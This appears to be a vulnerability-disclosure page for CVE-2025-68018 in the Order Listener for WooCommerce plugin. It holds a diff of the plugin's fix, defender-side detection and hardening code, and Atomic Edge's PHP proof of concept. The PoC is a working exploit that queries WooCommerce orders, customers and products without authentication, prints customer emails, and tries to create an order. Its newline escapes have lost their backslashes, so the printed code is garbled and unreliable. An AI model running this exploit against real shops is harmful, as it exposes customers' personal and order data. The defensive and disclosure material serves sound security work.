 			add_action( 'wp_update_nav_menu_item', array( $this, 'wp_update_nav_menu_item' ), 10, 3 );
@@ -215,9 +215,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $menu_item_db_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) ) {

@@ -245,9 +245,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $menu_item_db_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $menu_item_db_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}

--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/profile-options.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/profile-options.class.php
@@ -24,8 +24,8 @@
 		public function __construct( $key, $params ) {

 			$this->unique   = $key;
-			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this );
-			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this );
+			$this->args     = apply_filters( "pb_settings_{$this->unique}_args", wp_parse_args( $params['args'], $this->args ), $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+			$this->sections = apply_filters( "pb_settings_{$this->unique}_sections", $params['sections'], $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'admin_init', array( $this, 'add_profile_options' ) );

@@ -206,9 +206,9 @@

 			}

-			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $user_id, $this );
+			$data = apply_filters( "pb_settings_{$this->unique}_save", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_before", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_before", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( empty( $data ) ) {

@@ -236,9 +236,9 @@

 			}

-			do_action( "pb_settings_{$this->unique}_saved", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_saved", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			do_action( "pb_settings_{$this->unique}_save_after", $data, $user_id, $this );
+			do_action( "pb_settings_{$this->unique}_save_after", $data, $user_id, $this ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 		}
 	}
--- a/woc-order-alert/includes/wp-dev-kit/settings/classes/setup.class.php
+++ b/woc-order-alert/includes/wp-dev-kit/settings/classes/setup.class.php
@@ -11,6 +11,8 @@
 use WPDKClient;
 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'WPDK_Settings' ) ) {
 	class WPDK_Settings {

@@ -66,7 +68,7 @@
 		public function __construct() {

 			// Init action
-			do_action( 'pb_settings_init' );
+			do_action( 'pb_settings_init' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			add_action( 'after_setup_theme', array( 'WPDK_Settings', 'setup' ) );
 			add_action( 'init', array( 'WPDK_Settings', 'setup' ) );
@@ -174,7 +176,7 @@
 			// Setup taxonomy option framework
 			$params = array();
 			if ( class_exists( 'WPDK_Settings_Taxonomy_Options' ) && ! empty( self::$args['taxonomy_options'] ) ) {
-				$taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : '';
+				$taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Recommended
 				foreach ( self::$args['taxonomy_options'] as $key => $value ) {
 					if ( ! empty( self::$args['sections'][ $key ] ) && ! isset( self::$inited[ $key ] ) ) {

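Review bot: the ignore list on the `$_GET['taxonomy']` line names `WordPress.Security.NonceVerification.Recommended` twice; drop the duplicate. Reading this screen-selection parameter without a nonce is acceptable here because the value is only used to pick which options set to initialise and is already passed through `sanitize_text_field( wp_unslash( ... ) )`.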
@@ -245,7 +247,7 @@

 			}

-			do_action( 'pb_settings_loaded' );
+			do_action( 'pb_settings_loaded' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
@@ -360,7 +362,7 @@

 			$path     = '';
 			$file     = ltrim( $file, '/' );
-			$override = apply_filters( 'pb_settings_override', 'wpdk_settings-override' );
+			$override = apply_filters( 'pb_settings_override', 'wpdk_settings-override' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

 			if ( file_exists( get_parent_theme_file_path( $override . '/' . $file ) ) ) {
 				$path = get_parent_theme_file_path( $override . '/' . $file );
@@ -436,7 +438,7 @@
 			}

 			// Include all framework fields
-			$fields = apply_filters( 'pb_settings_fields', array(
+			$fields = apply_filters( 'pb_settings_fields', array( // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 				'accordion',
 				'background',
 				'backup',
@@ -589,7 +591,7 @@

 			}

-			if ( ! apply_filters( 'pb_settings_enqueue_assets', self::$enqueue ) ) {
+			if ( ! apply_filters( 'pb_settings_enqueue_assets', self::$enqueue ) ) { // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 				return;
 			}

@@ -601,11 +603,11 @@
 			wp_enqueue_script( 'wp-color-picker' );

 			// Font awesome 4 and 5 loader
-			if ( apply_filters( 'pb_settings_fa4', false ) ) {
-				wp_enqueue_style( 'wpdk_settings-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' );
+			if ( apply_filters( 'pb_settings_fa4', false ) ) { // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+				wp_enqueue_style( 'wpdk_settings-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
 			} else {
-				wp_enqueue_style( 'wpdk_settings-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' );
-				wp_enqueue_style( 'wpdk_settings-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' );
+				wp_enqueue_style( 'wpdk_settings-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
+				wp_enqueue_style( 'wpdk_settings-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' ); // phpcs:ignore PluginCheck.CodeAnalysis.EnqueuedResourceOffloading.OffloadedContent
 			}

 			$version = defined( 'PB_CLEAN_CACHE' ) && PB_CLEAN_CACHE ? time() : self::$version;
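Review bot: the Font Awesome 5 stylesheets are fetched from `@fortawesome/fontawesome-free@5.15.4` but registered with version `'5.15.5'`; align the two so the cache-busting string reflects the asset actually loaded. The new `OffloadedContent` suppressions acknowledge the CDN dependency rather than addressing it: bundling the CSS with the plugin (what the Plugin Check sniff asks for) removes a third-party origin from the admin, and if the CDN must remain, add `integrity` attributes through the `style_loader_tag` filter.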
@@ -624,13 +626,13 @@
 			wp_enqueue_script( 'pb_settings', self::include_plugin_url( 'assets/js/main.js' ), array( 'wpdk_settings-plugins' ), $version, true );

 			// Main variables
-			wp_localize_script( 'pb_settings', 'pb_settings_vars', array(
-				'color_palette' => apply_filters( 'pb_settings_color_palette', array() ),
+			wp_localize_script( 'pb_settings', 'pb_settings_vars', array(
+				'color_palette' => apply_filters( 'pb_settings_color_palette', array() ), // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
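
An added defender-side check, not Atomic Edge's PoC and not code from the plugin: a must-use plugin that flags any callback granting WooCommerce's `woocommerce_rest_check_permissions` filter unconditionally (the `__return_true` pattern behind CVE-2025-68018) and shows the hardened callback shape that defers to WooCommerce's own verdict. The `example_` function names are assumptions.

```php
<?php
/**
 * Added example (not the plugin's code): detect a REST permission bypass and
 * show the safe callback shape. Drop into wp-content/mu-plugins/ or run with
 * `wp eval-file`. Requires WP >= 4.7 (WP_Hook).
 */

defined( 'ABSPATH' ) || exit;

/**
 * Return descriptions of callbacks on $hook_name that always return true.
 * Assumed helper name; walks WP_Hook::$callbacks (priority => idx => cb).
 */
function example_find_permissive_callbacks( $hook_name ) {
	global $wp_filter;
	$found = array();

	if ( empty( $wp_filter[ $hook_name ] ) || ! ( $wp_filter[ $hook_name ] instanceof WP_Hook ) ) {
		return $found;
	}

	foreach ( $wp_filter[ $hook_name ]->callbacks as $priority => $callbacks ) {
		foreach ( $callbacks as $idx => $cb ) {
			// __return_true is WordPress's built-in "always allow" helper;
			// hooked on a permission filter it disables the check entirely.
			if ( is_string( $cb['function'] ) && '__return_true' === $cb['function'] ) {
				$found[] = sprintf( '__return_true at priority %d (%s)', $priority, $idx );
			}
		}
	}
	return $found;
}

/**
 * Hardened callback shape (assumed name). Signature follows
 * apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, $object ).
 * Grant only to users holding manage_woocommerce; otherwise return
 * WooCommerce's own $permission so its default checks still apply.
 */
function example_rest_check_permissions( $permission, $context, $object_id, $object ) {
	if ( current_user_can( 'manage_woocommerce' ) ) {
		return true;
	}
	return $permission;
}

// Run late on init so every plugin has registered its hooks first.
add_action( 'init', function () {
	$hits = example_find_permissive_callbacks( 'woocommerce_rest_check_permissions' );
	if ( empty( $hits ) ) {
		return;
	}
	// Surface the finding to operators: log it and show an admin notice.
	error_log( '[rest-permission check] WooCommerce REST permission checks bypassed by: ' . implode( '; ', $hits ) );
	add_action( 'admin_notices', function () use ( $hits ) {
		echo '<div class="notice notice-error"><p>' .
			esc_html( 'WooCommerce REST permission checks are disabled by: ' . implode( '; ', $hits ) ) .
			'</p></div>';
	} );
}, PHP_INT_MAX );
```

If a hit is reported, `remove_filter( 'woocommerce_rest_check_permissions', '__return_true', <reported priority> )` from the same mu-plugin restores WooCommerce's own checks until the patched plugin version is installed.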

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68018 - Order Listener for WooCommerce <= 3.6.1 - Missing Authorization

/**
 * Proof of Concept for CVE-2025-68018
 * Demonstrates unauthorized access to WooCommerce REST API
 * when Order Listener for WooCommerce plugin <= 3.6.1 is active.
 */

$target_url = 'https://example.com'; // CHANGE THIS to target WordPress site

// WooCommerce REST API endpoints that would normally require authentication
$endpoints = [
    '/wp-json/wc/v3/orders',           // List all orders
    '/wp-json/wc/v3/orders/123',       // Get specific order (change ID)
    '/wp-json/wc/v3/products',         // List products
    '/wp-json/wc/v3/customers',        // List customers
];

foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    
    echo "n[+] Testing endpoint: $endpointn";
    echo "    URL: $urln";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    // No authentication headers - testing unauthenticated access
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    echo "    HTTP Status: $http_coden";
    
    if ($http_code == 200) {
        echo "    [+] VULNERABLE: Successfully accessed REST API without authenticationn";
        echo "    Response preview: " . substr($response, 0, 200) . "...n";
        
        // Parse JSON response to show data exposure
        $data = json_decode($response, true);
        if (is_array($data)) {
            if (isset($data[0]['id'])) {
                echo "    [+] Found " . count($data) . " recordsn";
                if (count($data) > 0) {
                    echo "    First record ID: " . $data[0]['id'] . "n";
                    if (isset($data[0]['billing'])) {
                        echo "    Customer email: " . ($data[0]['billing']['email'] ?? 'N/A') . "n";
                    }
                }
            } elseif (isset($data['id'])) {
                echo "    [+] Accessed single record ID: " . $data['id'] . "n";
                if (isset($data['billing'])) {
                    echo "    Customer email: " . ($data['billing']['email'] ?? 'N/A') . "n";
                }
            }
        }
    } elseif ($http_code == 401 || $http_code == 403) {
        echo "    [-] NOT VULNERABLE: Received authentication/authorization errorn";
    } else {
        echo "    [?] Unexpected response coden";
    }
}

// Also test with POST method to check write access
$test_order_url = $target_url . '/wp-json/wc/v3/orders';
echo "n[+] Testing write access (POST to create order)n";
echo "    URL: $test_order_urln";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $test_order_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    'payment_method' => 'test',
    'billing' => [
        'first_name' => 'Test',
        'last_name' => 'Exploit',
        'email' => 'test@example.com'
    ]
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json'
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

echo "    HTTP Status: $http_coden";
if ($http_code == 201) {
    echo "    [+] CRITICAL: Can create orders without authenticationn";
} elseif ($http_code == 200) {
    echo "    [+] Can potentially modify datan";
} elseif ($http_code == 401 || $http_code == 403) {
    echo "    [-] Write access properly restrictedn";
}

?>
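For the defender's side of the PoC above, the following is an added illustration (not the plugin's own code) of the vulnerable hook beside a hardened callback of the kind the 3.6.2 fix introduces, plus a temporary mitigation for sites that cannot update immediately. The function name `example_woa_check_permissions`, the `plugins_loaded` timing and the assumption that the vulnerable filter was registered at the default priority 10 are mine, not taken from the plugin.

```php
<?php
// Added illustration, not code from Order Listener for WooCommerce.
//
// Vulnerable pattern (versions <= 3.6.1, class-hooks.php): every WooCommerce
// REST permission check is short-circuited to true, so unauthenticated
// callers pass for orders, customers, products and any other wc/v3 route.
//
//     add_filter( 'woocommerce_rest_check_permissions', '__return_true' );

/**
 * Hardened callback. WooCommerce applies the filter as
 * apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, $post_type ),
 * so the callback receives the result WooCommerce already computed.
 *
 * Only users holding manage_woocommerce (shop managers, administrators)
 * are granted access; everyone else gets the original $permission back,
 * which leaves WooCommerce's default checks in force instead of bypassing them.
 */
function example_woa_check_permissions( $permission, $context = 'read', $object_id = 0, $post_type = '' ) {
    if ( is_user_logged_in() && current_user_can( 'manage_woocommerce' ) ) {
        return true;
    }
    return $permission; // never widen access for anyone else
}
add_filter( 'woocommerce_rest_check_permissions', 'example_woa_check_permissions', 10, 4 );

/**
 * Temporary mitigation for an unpatched install, e.g. as an mu-plugin:
 * detach the unconditional grant after all plugins have registered their hooks.
 * Assumes the vulnerable plugin used the default priority (10); adjust if not.
 * Updating to 3.6.2 remains the real fix.
 */
add_action( 'plugins_loaded', function () {
    remove_filter( 'woocommerce_rest_check_permissions', '__return_true', 10 );
}, PHP_INT_MAX );
```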
